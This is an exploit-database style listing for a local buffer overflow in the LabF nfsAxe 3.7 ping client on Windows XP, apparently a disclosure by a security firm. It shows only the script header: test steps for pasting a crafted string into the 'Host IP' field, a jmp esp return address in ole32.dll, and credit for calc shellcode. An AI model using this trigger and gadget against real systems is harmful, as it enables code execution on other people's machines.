Exploits / Vulnerability Discovered : 2019-04-22 |
Type : local |
Platform : windows
[+] Code ...
#!/usr/bin/python
# Exploit Title: LabF nfsAxe 3.7 Ping Client - Buffer Overflow (Vanilla)
# Date: 20-04-2019
# Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: http://www.labf.com/nfsaxe
# Version: 3.7
# Software Link : http://www.labf.com/download/nfsaxe.exe
# Contact: services[@]telspace.co.za
# Twitter: @telspacesystems (Greets to the Telspace Crew)
# Tested on: Windows XP SP3 ENG x86
# CVE: TBC from Mitre
# PoC:
# 1.) Generate nfsaxeping.txt, copy the contents to clipboard.
# 2.) In the application(ping.exe) paste contents of clipboard in to "Host IP" and click ok.
# 3.) Click Start and calc pops
#0x775a693b : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.6435 (C:\WINDOWS\system32\ole32.dll)
#Special thanks to John Leitch for the Windows XP SP3 EN Calc Shellcode (16 Bytes)